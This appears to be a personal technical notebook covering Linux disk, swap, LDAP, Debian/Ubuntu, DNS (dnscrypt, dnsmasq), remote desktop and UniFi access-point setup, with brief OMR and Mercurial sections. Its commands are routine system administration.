$ sudo blkid
/dev/sda1: UUID="5E38BE8B38BE6227" TYPE=""
/dev/sda5: UUID="4668484A68483B47" TYPE="ntfs"
/dev/sda6: UUID="6fa5a72a-ba26-4588-a103-74bb6b33a763" TYPE="ext4"
/dev/sda7: UUID="94443023-34a1-4428-8f65-2fb02e571dae" TYPE="swap"
/dev/sda8: UUID="13f35f59-f023-4d98-b06f-9dfaebefd6c1" TYPE="ext4"
/dev/sdb1: UUID="08D1-8024" TYPE="vfat"

30.3.2 How to check Swap space in Linux

This will show your allocated swap disk or disks, if any:

swapon -s

Type the following command to see total and used swap size:

cat /proc/swaps

This will show both your memory and your swap usage:

# Size options are: -k, -m, -g $ free -m


30.3.3 Create an image file for swap

https://www.digitalocean.com/community/tutorials/how-to-configure-virtual-memory-swap-file-on-a-vps

$ cd /var
$ touch swap.img
$ chmod 600 swap.img

# to create a 512MB image file
$ dd if=/dev/zero of=/var/swap.img bs=1024k count=512
$ mkswap /var/swap.img
$ swapon /var/swap.img

30.3.4 Remove swap

$ sudo swapoff /var/swap.img
$ sudo rm /var/swap.img

https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/3/html/System_Administration_Guide/s1-swap-removing.html

30.3.5 Mount and UnMount usb

$ ls -la /dev/disk/by-uuid/
$ mkdir /mnt/sdc1
$ mount /dev/sdc1 /mnt/sdc1

# to unmount
$ umount /dev/sdc1

30.3.6 What is a symbolic link?

A symbolic link, also termed a soft link, is a special kind of file that points to another file, much like a shortcut in Windows or a Macintosh alias. Unlike a hard link, a symbolic link does not contain the data in the target file; it simply points to another entry somewhere in the file system. A hard link is where there are actually two entries in a file system's FAT table which go to the same memory location, as opposed to a symlink where one file points to another. With a hard link you can actually delete the original file, but as other links will remain, it is still available elsewhere. This difference gives symbolic links certain qualities that hard links do not have, such as the ability to link to directories, or to files on remote computers networked through NFS. Also, when you delete a target file, symbolic links to that file become unusable, whereas hard links preserve the contents of the file.

To create a symbolic link in Unix, at the Unix prompt, enter:

ln -s source_file myfile

Replace source_file with the name of the existing file for which you want to create the symbolic link (this file can be any existing file or directory across the file systems). Replace myfile with the name of the symbolic link. The ln command then creates the symbolic link.


After you’ve made the symbolic link, you can perform an operation on or execute myfile, just as you could with the source_file. You can use normal file management commands (e.g., cp, rm) on the symbolic link. Note: If you delete the source file or move it to a different location, your symbolic file will not function properly. You should either delete or move it. If you try to use it for other purposes (e.g., if you try to edit or execute it), the system will send a “file nonexistent” message.

30.3.7 What is a hard link?

A hard link is essentially a label or name assigned to a file. Conventionally, we think of a file as consisting of a set of information that has a single name. However, it is possible to create a number of different names that all refer to the same contents. Commands executed upon any of these different names will then operate upon the same file contents.

To make a hard link to an existing file, enter:

ln oldfile newlink

Replace oldfile with the original filename, and newlink with the additional name you'd like to use to refer to the original file. This will create a new item in your working directory, newlink, which is linked to the contents of oldfile. The new link will show up along with the rest of your filenames when you list them using the ls command. This new link is not a separate copy of the old file, but rather a different name for exactly the same file contents as the old file. Consequently, any changes you make to oldfile will be visible in newlink.

You can use the standard Unix rm command to delete a link. After a link has been removed, the file contents will still exist as long as there is one name referencing the file. Thus, if you use the rm command on a filename, and a separate link exists to the same file contents, you have not really deleted the file; you can still access it through the other link. Consequently, hard links can make it difficult to keep track of files. Furthermore, hard links cannot refer to files located on different computers linked by NFS, nor can they refer to directories. For all of these reasons, you should consider using a symbolic link, also known as a soft link, instead of a hard link.
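A quick way to see this behavior in practice (a sketch; the file names are arbitrary):

$ echo data > oldfile
$ ln oldfile newlink
$ ls -li oldfile newlink   # both names show the same inode number and a link count of 2
$ rm oldfile
$ cat newlink              # the contents are still reachable through the remaining name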

30.3.8 Summarize disk usage of each FILE, recursively for directories

-h, --human-readable print sizes in human readable format (e.g., 1K 234M 2G) -s, --summarize display only a total for each argument

$ du -sh /home/or
12G     /home/or

$ ncdu /home/or


30.3.9 Clean NTFS partition for windows cache files

root@debian:/home/or# mount -a

The disk contains an unclean file system (0, 0). Metadata kept in Windows cache, refused to mount. Failed to mount ‘/dev/sdb6’: Operation not permitted The NTFS partition is in an unsafe state. Please resume and shutdown Windows fully (no hibernation or fast restarting), or mount the volume

# sudo apt-get install ntfsprogs

# sudo ntfsfix /dev/sda3

ntfsfix is a utility that fixes some common NTFS problems. ntfsfix is NOT a Linux version of chkdsk. It only repairs some fundamental NTFS inconsistencies, resets the NTFS journal file and schedules an NTFS consistency check for the first boot into Windows. You may run ntfsfix on an NTFS volume if you think it was damaged by Windows or some other way and it cannot be mounted.

• http://askubuntu.com/questions/313872/ubuntu-13-04-is-unable-to-mount-a-disk-drive-from-ex-windows-system
• http://askubuntu.com/a/71205/237607

30.3.10 Make sub directory

$ mkdir -p /new/sub/folder

30.3.11 How to Sort Folders by Size With One Command Line in Linux

$ du --max-depth=1 /home/ | sort -n -r
$ du -H --max-depth=1 /home/user
$ du -h --max-depth=1 | sort -hr

http://www.ducea.com/2006/05/14/tip-how-to-sort-folders-by-size-with-one-command-line-in-linux/
http://unix.stackexchange.com/questions/185764/how-do-i-get-the-size-of-a-directory-on-the-command-line

30.3.12 How to Free Up a Lot of Disk Space by Deleting Cached Package Files

$ sudo du -h /var/cache/apt/archives
$ sudo apt-get clean

Disable Automatic Package Caching

If you'd rather not have to go in and clean out the cache folders all the time, you can tell Ubuntu to stop keeping them around with a simple configuration change. Head into System -> Administration -> Synaptic Package Manager, then choose Settings -> Preferences. Switch over to the Files tab, where you can change the option to "Delete downloaded packages after installation", which will prevent the caching entirely.


30.3.13 Mount unknown filesystem exfat

$ sudo apt-get install exfat-fuse exfat-utils

30.4 Memory

30.4.1 How to see system and process memory usage

$ apt-get install sysstat
$ pidstat -r
$ pidstat -r -p $(pidof java)

This will show both your memory and your swap usage:

# Size options are: -k, -m, -g $ free -m

30.5 CPU and Process

30.5.1 Display a tree of processes

$ pstree

30.6 GPU

30.6.1 How to measure GPU usage?

https://askubuntu.com/questions/387594/how-to-measure-gpu-usage

nvidia-smi

https://developer.nvidia.com/nvidia-system-management-interface

$ watch nvidia-smi

$ nvidia-smi --loop-ms=1000

gpustat

https://github.com/wookayin/gpustat

$ pip install gpustat
$ gpustat
$ gpustat -cp
$ gpustat -cpi
$ watch gpustat


NOTE: This works with NVIDIA Graphics Devices only.

glances

https://github.com/nicolargo/glances

$ pip install glances
$ pip install glances[gpu]

30.6.2 Windows

GPU-Z https://www.techpowerup.com/gpuz/

30.7 LDAP http://www.debian-administration.org/articles/585#ldap-test1

30.7.1 Install LDAP packages

# apt-get install slapd ldap-utils libdb4.6
# dpkg-reconfigure slapd

30.7.2 Configure LDAP package

# dpkg-reconfigure slapd

Configuring slapd

  If you enable this option, no initial configuration or database will be created for you.

  Omit OpenLDAP server configuration?

Configuring slapd

  The DNS domain name is used to construct the base DN of the LDAP directory. For example,
  'foo.example.org' will create the directory with 'dc=foo, dc=example, dc=org' as base DN.

  DNS domain name:

  bws.example.com

Configuring slapd

  Please enter the name of the organization to use in the base DN of your LDAP directory.

  Organization name:

  example.com

Configuring slapd

  Please enter the password for the admin entry in your LDAP directory.

  Administrator password:

  ********

Configuring slapd

  Please enter the admin password for your LDAP directory again to verify that you have typed it correctly.

  Confirm password:

  ********

Configuring slapd

  The HDB backend is recommended. HDB and BDB use similar storage formats, but HDB adds support for subtree renames. Both support the same configuration options.

  In either case, you should review the resulting database configuration for your needs. See /usr/share/doc/slapd/README.DB_CONFIG.gz for more details.

  Database backend to use:  [BDB] HDB

Configuring slapd

  Do you want the database to be removed when slapd is purged?

Configuring slapd

  There are still files in /var/lib/ldap which will probably break the configuration process. If you enable this option, the maintainer scripts will move the old database files out of the way before creating a new database.

  Move old database?

Configuring slapd

  The obsolete LDAPv2 protocol is disabled by default in slapd. Programs and users should upgrade to LDAPv3. If you have old programs which can't use LDAPv3, you should select this option and 'allow bind_v2' will be added to your slapd.conf file.

  Allow LDAPv2 protocol?

30.7.3 Initial LDAP configuration

# vim /etc/ldap/ldap.conf

BASE    dc=bws,dc=example,dc=com
URI     ldap://172.16.1.200/

# vim /usr/share/slapd/slapd.conf

loglevel 256
index objectClass eq
index uid eq

# invoke-rc.d slapd stop
# slapindex
# chown openldap:openldap /var/lib/ldap/*
# invoke-rc.d slapd start

30.7.4 Initial test

# ldapsearch -x
# sudo slapcat

30.7.5 Creating basic tree structure

# vim ou.ldif

dn: ou=People,dc=bws,dc=example,dc=com
ou: People
objectClass: organizationalUnit

30.7.6 Load the LDIF file into the server

# invoke-rc.d slapd stop
# slapadd -c -v -l ou.ldif
# invoke-rc.d slapd start


30.7.7 Test LDIF

# ldapsearch -x ou=people

30.7.8 Creating user accounts

# vim users.ldif

dn: cn=omidraha,dc=bws,dc=example,dc=com
objectClass: person
objectClass: top
cn: omidraha
sn: omidraha

30.7.9 Load the LDIF file into the server

# ldapadd -x -D "cn=admin,dc=bws,dc=example,dc=com" -W -f users.ldif

30.7.10 To define the new user’s password

# ldappasswd -x -D cn=admin,dc=bws,dc=example,dc=com -W -S cn=omidraha,dc=bws,dc=example,dc=com

30.7.11 Verify the user entry has been created

# ldapsearch -x cn=omidraha

30.7.12 Sample python code to test

def auth_by_ldap(username, password, domain='dc=bws,dc=example,dc=com',
                 server='ldap://localhost/'):
    import ldap
    con = ldap.initialize(server)
    dn = 'cn={},{}'.format(username, domain)
    try:
        con.simple_bind_s(dn, password.encode('utf8'))
    except ldap.INVALID_CREDENTIALS:
        return False
    return True
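The same simple bind can also be verified from the shell with ldapwhoami from the ldap-utils package (a quick check, using the user entry created above):

$ ldapwhoami -x -D "cn=omidraha,dc=bws,dc=example,dc=com" -W
# prompts for the password and prints the bound DN on success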

30.8 Cent OS

30.8.1 EPEL https://fedoraproject.org/wiki/EPEL

http://kartolo.sby.datautama.net.id/EPEL/7/x86_64/repoview/epel-release.html
http://kartolo.sby.datautama.net.id/EPEL/7/x86_64/e/epel-release-7-1.noarch.rpm

$ curl -O http://kartolo.sby.datautama.net.id/EPEL/7/x86_64/e/epel-release-7-1.noarch.rpm
# rpm -ivh epel-release-7-1.noarch.rpm
$ rm epel-release-7-1.noarch.rpm

30.9 Debian

30.9.1 Removed unused packages http://www.waveguide.se/?article=how-to-quickly-remove-all-unused-packages-under-debian https://www.debian-administration.org/article/134/Removing_unnecessary_packages_with_deborphan

$ deborphan
$ deborphan --guess-data
$ deborphan --guess-all
$ dpkg --purge `deborphan --guess-all`

$ egrep '^Status: |^Package: ' /var/lib/dpkg/status | egrep -B1 'half-installed|half-configured|unpacked|triggers-awaited|triggers-pending'
$ dpkg --audit

30.9.2 Annoying autorenaming in Guake

http://askubuntu.com/questions/254566/annoying-autorenaming-in-guake

First install gconf-editor:

$ sudo apt-get install gconf-editor

Then run gconf-editor, browse to /apps/guake/general and uncheck the use_vte_titles key.

30.9.3 How do you uninstall a library in Linux?

http://stackoverflow.com/questions/1439950/whats-the-opposite-of-make-install-ie-how-do-you-uninstall-a-library-in-lin

If sudo make uninstall is unavailable: on a Debian-based system, instead of doing make install you can run sudo checkinstall (or the .rpm etc. equivalent) to build a .deb that is also automatically installed. You can then remove it using synaptic.

$ sudo checkinstall


30.9.4 Thunderbird

The Icedove debian package is an unbranded Thunderbird. Enigmail is a security extension to Thunderbird and SeaMonkey. It enables you to write and receive email messages signed and/or encrypted with the OpenPGP standard. Sending and receiving encrypted and digitally signed email is simple using Enigmail.

30.9.5 Yandex Setting up mail clients https://help.yandex.com/mail/mail-clients.xml

30.9.6 How to adjust screen lock settings on Linux debian desktop

To adjust screen lock settings from the command line, you can edit ~/.kde/share/config/kscreensaverrc. Create the file if it does not exist. Once the file is edited, the change will automatically take effect immediately.

$ vi ~/.kde/share/config/kscreensaverrc

[ScreenSaver] Lock=true LockGrace=300000 PlasmaEnabled=false Timeout=900

30.9.7 How to install Google Earth on Debian

# aptitude install googleearth-package
$ make-googleearth-package
$ apt-get install -f
# dpkg -i googleearth_4.2.205.5730+0.5.2-1_i386.deb

30.9.8 Restarting Networking

# systemctl restart networking
# systemctl restart network-manager

https://wiki.debian.org/NetworkManager

30.9.9 Package manager is locked

$ rm /var/lib/dpkg/lock /var/cache/apt/archives/lock /var/lib/apt/lists/lock

30.9.10 Some index files failed to download


$ sudo apt-get update
E: Some index files failed to download. They have been ignored, or old ones used instead.

It means that these sources cannot be reached, try selecting another server to fetch from.

30.10 Ubuntu

30.10.1 Ubuntu Server

Ubuntu Server 14.04.3 LTS
The Long Term Support version of Ubuntu Server, including the Icehouse release of OpenStack and support guaranteed until April 2019 (64-bit only).

Ubuntu Server 15.10
The latest version of Ubuntu Server, including the Liberty release of OpenStack and support for nine months (64-bit only).

30.10.2 SSH only allows public key authentication when you first login with password because I encrypted my home directory

SSH can't read the authorized_keys file until you log in, so basically it forces you to password authenticate first. See the troubleshooting section of the following:

https://help.ubuntu.com/community/SSH/OpenSSH/Keys

$ sudo mkdir /etc/ssh/<username>
$ sudo chown <username>:<username> /etc/ssh/<username>
$ sudo chmod 755 /etc/ssh/<username>
$ mv ~/.ssh/authorized_keys /etc/ssh/<username>/
$ chmod 644 /etc/ssh/<username>/authorized_keys
$ chown <username>:<username> /etc/ssh/<username>/authorized_keys

$ sudo vim /etc/ssh/sshd_config
AuthorizedKeysFile /etc/ssh/%u/authorized_keys

$ sudo service ssh restart

$ ssh <host>
# Note: Now you can see an empty home directory with default files,
# and some files about the unmounted encrypted partition.
# You need to run the ``ecryptfs-mount-private`` command and enter the password for the
# encrypted partition.
$ ecryptfs-mount-private

http://askubuntu.com/a/162270

30.10.3 Checks the Ubuntu version


# gives you the description including the OS name
$ lsb_release -d
# gives you just the codename
$ lsb_release -c
# for the release number only, use
$ lsb_release -r
# for all lsb version details, use
$ lsb_release -a

http://askubuntu.com/questions/150917/what-terminal-command-checks-the-ubuntu-version

30.10.4 ubuntu UFW

Ubuntu's default firewall (UFW: Uncomplicated Firewall) denies all forwarding traffic by default, which is needed by docker. Enable forwarding with UFW by editing the UFW configuration file:

$ sudo vim /etc/default/ufw

Scroll down and find the line beginning with DEFAULT_FORWARD_POLICY. Replace:

DEFAULT_FORWARD_POLICY="DROP"

With:

DEFAULT_FORWARD_POLICY="ACCEPT"

Finally:

$ sudo ufw reload https://www.digitalocean.com/community/tutorials/docker-explained-how-to-containerize-python-web-applications

30.10.5 Connect to wireless network manually

nmcli

Check to see which ESSID we can see:

$ sudo apt-get install network-manager $ nmcli dev wifi

Verify the name of the ESSID and we proceed on using it on the next line including the password needed for it (This includes WEP and WPA type passwords):

$ nmcli dev wifi connect ESSID_NAME password ESSID_PASSWORD


Automatic Wireless Connection on Login

$ sudo nano /etc/network/interfaces

auto wlan0
iface wlan0 inet static
    address ASSIGNED_IP
    netmask 255.255.255.0
    gateway THE_GATEWAY
    wireless-essid YOURSSID
    wireless-key WIRELESSKEY_HERE

https://askubuntu.com/questions/16584/how-to-connect-and-disconnect-to-a-network-manually-in-terminal

$ sudo apt-get install wpasupplicant
$ sudo apt-get install wireless-tools

30.10.6 Make apt-get not prompt for replacement of configuration files

$ apt-get -o Dpkg::Options::=--force-confnew -y dist-upgrade

--force-confold: do not modify the current configuration file; the new version is installed with a .dpkg-dist suffix. With this option alone, even configuration files that you have not modified are left untouched. You need to combine it with --force-confdef to let dpkg overwrite configuration files that you have not modified.

--force-confnew: always install the new version of the configuration file; the current version is kept in a file with the .dpkg-old suffix.

--force-confdef: ask dpkg to decide alone when it can and prompt otherwise. This is the default behavior of dpkg and this option is mainly useful in combination with --force-confold.

--force-confmiss: ask dpkg to install the configuration file if it's currently missing (for example because you have removed the file by mistake).

https://raphaelhertzog.com/2010/09/21/debian-conffile-configuration-file-managed-by-dpkg/

30.10.7 Upgrade from Ubuntu 16.0.4 to Ubuntu Linux 18.04

$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.5 LTS
Release:        16.04
Codename:       xenial

$ sudo do-release-upgrade

$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.1 LTS
Release:        18.04
Codename:       bionic


30.11 Systemd

# systemd
# systemctl status nginx
# journalctl -f
# journalctl -f -u nginx
# ls -la /run/log/journal/
# ps auxf

https://en.wikipedia.org/wiki/Systemd

30.12 DNS.

30.12.1 Transparent DNS proxies

Some ISP’s are now using a technology called ‘Transparent DNS proxy’. Using this technology, they will intercept all DNS lookup requests (TCP/UDP port 53) and transparently proxy the results. This effectively forces you to use their DNS service for all DNS lookups. If you have changed your DNS settings to use an ‘open’ DNS service such as Google, Comodo or OpenDNS, expecting that your DNS traffic is no longer being sent to your ISP’s DNS server, you may be surprised to find out that they are using transparent DNS proxying.
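A rough way to check whether your ISP does this (203.0.113.1 is a reserved documentation address that runs no DNS server, so the query should normally just time out; getting an answer anyway suggests port 53 is being intercepted):

$ dig example.com @203.0.113.1 +time=3 +tries=1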

30.12.2 DNSCrypt

DNSCrypt encrypts and authenticates DNS traffic between user and DNS resolver. While IP traffic itself is unchanged, it prevents local spoofing of DNS queries, ensuring DNS responses are sent by the server of choice. https://wiki.archlinux.org/index.php/DNSCrypt

30.12.3 dnscrypt-proxy

DNSCrypt is a protocol for securing communications between a client and a DNS resolver, preventing spying, spoofing or man-in-the-middle attacks. To use it, you’ll need a tool called dnscrypt-proxy, which “can be used directly as your local resolver or as a DNS forwarder, authenticating requests using the DNSCrypt protocol and passing them to an upstream server”. Check current local DNS service:

$ sudo ss -lp 'sport = :domain'

Netid  State   Recv-Q  Send-Q   Local Address:Port      Peer Address:Port
udp    UNCONN  23040   0        127.0.0.53%lo:domain    0.0.0.0:*      users:(("systemd-resolve",pid=948,fd=12))
tcp    LISTEN  0       128      127.0.0.53%lo:domain    0.0.0.0:*      users:(("systemd-resolve",pid=948,fd=13))

Disable systemd-resolve service according to the above output:

$ sudo systemctl stop systemd-resolved
$ sudo systemctl disable systemd-resolved

Check current local DNS service again:

$ sudo ss -lp 'sport = :domain'

Uninstall old version:

$ sudo apt-get purge dnscrypt-proxy

Install new version:

$ sudo add-apt-repository ppa:shevchuk/dnscrypt-proxy
$ sudo apt update
$ sudo apt install dnscrypt-proxy

Configs:

$ sudo cat /etc/resolv.conf

# Generated by NetworkManager
nameserver 127.0.2.1

$ cat /etc/dnsmasq.d/dnscrypt-proxy

# Redirect everything to dnscrypt-proxy
no-resolv
server=127.0.2.1
proxy-dnssec

Now you can see that all your DNS queries are secured (they show up as protocol "quic" in the Wireshark filter box). To view the related listening ports:

# netstat -uanp

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 127.0.0.1:40            0.0.0.0:*                           1/init
udp        0      0 0.0.0.0:53              0.0.0.0:*                           3089/dnsmasq
udp        0      0 0.0.0.0:68              0.0.0.0:*                           2000/dhclient
udp        0      0 0.0.0.0:68              0.0.0.0:*                           2221/dhclient
udp        0      0 0.0.0.0:33908           0.0.0.0:*                           853/dnscrypt-proxy
udp6       0      0 :::53                   :::*                                3089/dnsmasq

Check service status:

$ sudo systemctl status dnscrypt-proxy

https://github.com/jedisct1/dnscrypt-proxy
https://wiki.archlinux.org/index.php/DNSCrypt
https://github.com/jedisct1/dnscrypt-proxy/wiki/Installation-linux
https://github.com/jedisct1/dnscrypt-proxy/wiki/Installation-Debian-Ubuntu

30.12.4 resolveconf

$ /etc/resolv.conf

Normally the resolvconf program is run only by network interface configuration programs such as ifup(8), ifdown, NetworkManager(8), dhclient(8), and pppd(8); and by local nameservers such as dnsmasq(8). These programs obtain nameserver information from some source and push it to resolvconf.

$ resolvconf
$ /etc/network/interfaces

https://wiki.debian.org/HowTo/dnsmasq
https://sfxpt.wordpress.com/2011/02/06/providing-dhcp-and-dns-services-with-dnsmasq/

30.12.5 dnssec-trigger and unbound

# apt-get install dnssec-trigger
# apt-get install unbound

30.12.6 How do I install dig?

$ sudo apt-get install dnsutils

http://askubuntu.com/a/25100/237607

30.12.7 Disable builtin dnsmasq on the network manager

$ pstree -sp $(pidof dnsmasq)
$ lsof -i :53
$ netstat -uanp


$ sudo vim /etc/NetworkManager/NetworkManager.conf

[main]
plugins=ifupdown,keyfile,ofono
# dns=dnsmasq

$ sudo service network-manager restart
$ sudo service networking restart
$ killall -9 dnsmasq

https://unix.stackexchange.com/a/304129

30.12.8 Deploying a DNS Server using Docker http://www.damagehead.com/blog/2015/04/28/deploying-a-dns-server-using-docker/

$ docker run --name bind -it --rm \ --publish 53:53/tcp --publish 53:53/udp --publish 10000:10000/tcp \ --volume /srv/docker/bind:/data \ sameersbn/bind:9.9.5-20170129

We create the forward zone example.com by selecting Create master zone and, in the Create new zone dialog, set the Zone type to Forward, the Domain Name to example.com, the Master server to ns.example.com, set Email address to the domain administrator's email address and select Create. Next, create the DNS entry for ns.example.com pointing to 172.17.42.1 and apply the configuration.

To complete this tutorial we will create an address (A) entry for webserver.example.com and then add a domain name alias (CNAME) entry www.example.com which will point to webserver.example.com.

To create the A entry, select the zone example.com and then select the Address option. Set the Name to webserver and the Address to 192.168.1.1.

To create the CNAME entry, select the zone example.com and then select the Name Alias option. Set the Name to www and the Real Name to webserver and apply the configuration.

And now, the moment of truth:

$ host webserver.example.com 192.168.1.10
$ host www.example.com 192.168.1.10

192.168.1.10 is the address of the DNS server (the local host machine).
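For reference, the records created above correspond roughly to the following zone file (a sketch; the file path and the SOA timer values are illustrative, not part of the tutorial):

$ sudo vim /srv/docker/bind/example.com.zone

$TTL 3600
@           IN  SOA   ns.example.com. admin.example.com. ( 1 3600 600 86400 3600 )
@           IN  NS    ns.example.com.
ns          IN  A     172.17.42.1
webserver   IN  A     192.168.1.1
www         IN  CNAME webserver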

Resolve all domain names to a specific IP

$ sudo vim /etc/hosts

127.0.0.1 example.com
127.0.0.1 www.example.com

$ sudo apt-get install dnsmasq

$ sudo vim /etc/dnsmasq.conf

conf-dir=/etc/dnsmasq.d/,*.conf

$ sudo vim /etc/dnsmasq.d/demo.conf

no-dhcp-interface=wlp3s0
bogus-priv
address=/#/192.168.1.10

$ sudo systemctl restart dnsmasq

192.168.1.10 is the address of the DNS server (the local host machine).
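To confirm the wildcard rule, any name should now resolve to that address (assuming dig from the dnsutils package is installed):

$ dig +short some-random-name.example.org @192.168.1.10
192.168.1.10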

Disable systemd-resolved

The systemd-resolved service cannot be uninstalled, but it can be disabled with the following commands:

$ sudo systemctl disable systemd-resolved.service
$ sudo systemctl stop systemd-resolved

Check what may already be listening on port 53:

$ ss -lp 'sport = :domain'

Install proxychains4

$ apt-get install proxychains4
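Proxies are read from the ProxyList section of the configuration file (a minimal sketch; it assumes the default Debian config path and a local SOCKS5 proxy on port 1080):

$ sudo vim /etc/proxychains4.conf

[ProxyList]
socks5 127.0.0.1 1080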

$ proxychains4 curl google.com

https://github.com/rofl0r/proxychains-ng

30.13 LibreOffice

30.13.1 How to change the text direction in LibreOffice?

Enable Complex Text Layout (CTL) support (sources: 1, 2, 3): Tools → Options → Language Settings → Languages. It may be necessary to restart LibreOffice after enabling CTL. Then:
Ctrl+Shift+D or Ctrl+Right Shift: switch to right-to-left text entry
Ctrl+Shift+A or Ctrl+Left Shift: switch to left-to-right text entry
If the shortcuts don't work using Left Ctrl, try Right Ctrl.

http://superuser.com/questions/543559/how-to-change-the-text-direction-in-libreoffice


30.14 Webdav

Upload a file

$ sudo apt-get install cadaver
$ cadaver https://example.com/webdav
Username:
Password:
dav:/webdav/> put /path/of/file/on/local/to/upload/to/remote/server
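The same upload can also be done non-interactively with curl (a hedged alternative; with a trailing slash, curl keeps the local file name on the server):

$ curl -u USERNAME -T /path/of/file/on/local https://example.com/webdav/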

http://accc.uic.edu/answer/how-do-i-access-webdisks-linux-or-unix
https://docs.oracle.com/cd/E21764_01/portal.1111/e10235/webdav007.htm

30.15 Remote Desktop

30.15.1 Configure users to connect to Debian from a Windows machine using Remote Desktop

$ sudo apt-get install xrdp
$ sudo apt-get install xfce4
$ apt-get install xfce4 xfce4-goodies gnome-icon-theme
$ echo xfce4-session > ~/.xsession

For good measure, it is a good idea to edit the startwm.sh file to ensure that XRDP will always use xfce4. Add the following lines at the end of the file:

$ sudo vim /etc/xrdp/startwm.sh

. /etc/X11/Xsession
. /usr/bin/startxfce4

Then connect using the RDP client from Windows 7 (mstsc.exe).

https://community.spiceworks.com/how_to/92663-configure-users-to-connect-to-ubuntu-14-04-from-a-windows-machine-using-remote-desktop
http://scarygliders.net/2011/11/17/x11rdp-ubuntu-11-10-gnome-3-xrdp-customization-new-hotness/?PageSpeed=noscript

If it does not work:

$ sudo apt-get install tightvncserver
$ sudo adduser vnc
$ gpasswd -a vnc sudo
$ mkdir /home/vnc
$ chown -R vnc:vnc /home/vnc

30.16 Wireless

30.16.1 unifi

By package:


$ sudo dpkg -i unifi_sysvinit_all.deb
$ sudo service mongodb restart
$ sudo systemctl restart unifi

https://www.ubnt.com/download/unifi/unifi-ap-ac-lr/default/unifi-5723-controller-debianubuntu-linux

By Docker:

$ docker run --rm --init -p 8080:8080 -p 8443:8443 -p 3478:3478/udp -p 10001:10001/udp \
    -e TZ='Asia/Tehran' -v ~/ws/unifi/data:/var/lib/unifi -v ~/ws/unifi/logs:/var/log/unifi \
    --name unifi jacobalberty/unifi:5.7.28-sc

https://github.com/jacobalberty/unifi-docker

Browse the web ui: https://localhost:8443/

Setup DHCP and DNS server:

$ sudo vim /etc/dnsmasq.conf

conf-dir=/etc/dnsmasq.d/,*.conf

$ sudo vim /etc/dnsmasq.d/demo.conf

# no-dhcp-interface=wlp3s0
#interface=enp2s0
#bogus-priv
address=/#/192.168.1.10
dhcp-range=192.168.1.10,192.168.1.20,12h
dhcp-lease-max=25
dhcp-option=option:router,192.168.1.1

Setup network:

# Device > Config > Network > Configure IP (using DHCP)

Device > Config > Network > Configure IP (static IP)
    IP address: 192.168.1.2
    Subnet mask: 255.255.255.0
    Gateway: 192.168.1.10

Device > Details > Overview > IP: 192.168.1.2
    # @note: 192.168.1.2 is the AP IP

Device > Adopt > IP: 192.168.1.2
    # @note: 192.168.1.2 is the AP IP
    username: admin
    password: admin
    port: 22
    inform: http://192.168.1.10:8080/inform
    # @note: 192.168.1.10 is the unifi (docker on your pc) server IP


or@or:~$ ifconfig
    192.168.1.10
or@or:~$ ssh admin@192.168.1.2
box# info
    status: connected (http://192.168.1.10:8080/inform)
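If the AP does not show up for adoption, the inform URL can usually be set manually from the AP's shell (a hedged sketch; set-inform is the stock UniFi AP command):

box# set-inform http://192.168.1.10:8080/inform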

Settings > Site > Device > Authentication

ssh auth: admin admin

Settings > Network >
    Parent Interface: LAN
    Gateway/Subnet: 192.168.1.10/24
    DHCP mode: None

Settings > Wireless Network > Define a new wireless

How Automatic Detection of Captive Portal works

Basic strategy behind Captive Portal detection
The Automatic Detection of Captive Portal mechanism is based on a simple verification done by the operating system (OS) of the client device (smartphone, tablet, laptop). It simply tries to reach a specific URL and verifies that this URL returns a well-known result. If a Captive Portal is not in place, the result will match the expected one and the OS will know that there is full access to the internet. If the URL returns a result other than the expected one, the OS detects that there is a Captive Portal in place and that authentication is needed to get full access to the internet: in this case the OS opens the Splash Page automatically. (A quick way to reproduce this check is shown after the list below.)

Differences between Client devices
All client devices use the strategy described above to find out if they are behind a captive portal, but the URL may vary depending on the specific model of smartphone, tablet or laptop and on the specific OS version. Below is the list of domains contacted by each platform to detect the captive portal. If the domain is accessible and returns "Success", the Captive Portal is not triggered automatically; a "Success" response means the device is connected to the internet.

Android Captive Portal Detection
clients3.google.com

Apple iPhone, iPad with iOS 6 Captive Portal Detection
gsp1.apple.com
*.akamaitechnologies.com
www.apple.com
apple.com

Apple iPhone, iPad with iOS 7, 8, 9 and recent versions of OS X
www.appleiphonecell.com
*.apple.com
www.itools.info
www.ibook.info
www.airport.us
www.thinkdifferent.us
*.apple.com.edgekey.net
*.akamaiedge.net
*.akamaitechnologies.com

Windows
ipv6.msftncsi.com
ipv6.msftncsi.com.edgesuite.net
www.msftncsi.com
www.msftncsi.com.edgesuite.net
teredo.ipv6.microsoft.com
teredo.ipv6.microsoft.com.nsatc.net

https://success.tanaza.com/s/article/How-Automatic-Detection-of-Captive-Portal-works
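A minimal way to reproduce this check from a shell, assuming the Android detection endpoint listed above (an HTTP 204 status means no captive portal is intercepting traffic):

$ curl -s -o /dev/null -w '%{http_code}\n' http://clients3.google.com/generate_204
204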

CHAPTER 31

Machine Learning

Contents:

31.1 Tips

31.1.1 Optical mark recognition (OMR)

https://en.wikipedia.org/wiki/Optical_mark_recognition

openkm

$ docker pull openkm/openkm
$ docker run --name openkm -p 8000:8080 openkm/openkm

Browse: http://127.0.0.1:8000
username: okmAdmin
password: admin

sdaps

https://github.com/sdaps/sdaps
https://sdaps.org/Documentation/Tutorial/

$ docker pull lsakalauskas/sdaps

$ docker run --rm -v "$PWD":/ws/omr/ lsakalauskas/sdaps /ws/omr/sdaps setup_tex /ws/omr/example.tex

$ docker run --rm -v "$PWD":/ws/omr/ lsakalauskas/sdaps /ws/omr/sdaps add /ws/omr/example.tif
# Processing /ws/omr/example.tif
# Done

$ docker run --rm -v "$PWD":/ws/omr/ lsakalauskas/sdaps /ws/omr/sdaps annotate

$ docker run --rm -v "$PWD":/ws/omr/ lsakalauskas/sdaps /ws/omr/sdaps recognize
# 3 sheets
# 0.493762 seconds per sheet

$ docker run --rm -v "$PWD":/ws/omr/ lsakalauskas/sdaps /ws/omr/sdaps report

$ docker run --rm -v "$PWD":/ws/omr/ lsakalauskas/sdaps /ws/omr/sdaps csv export

https://github.com/tfitz/docker-sdaps

The example.tex file is here: https://sdaps.org/Documentation/Tutorial/example.tex
The example.tif file is here: https://sdaps.org/Documentation/Tutorial/example.tif
Scanning: https://sdaps.org/Documentation/Scanning/

CHAPTER 32

Hg Mercurial

Contents:

32.1 Tips

32.1.1 Sample .hgignore file

